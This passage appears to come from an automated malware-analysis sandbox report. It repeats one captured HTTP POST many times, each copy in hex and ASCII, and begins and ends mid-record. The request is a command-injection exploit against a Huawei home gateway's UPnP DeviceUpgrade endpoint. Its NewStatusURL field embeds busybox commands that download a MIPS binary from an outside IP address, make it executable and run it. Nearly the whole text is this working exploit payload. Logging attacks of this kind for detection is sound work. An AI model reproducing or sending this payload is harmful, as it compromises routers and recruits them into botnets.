/tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 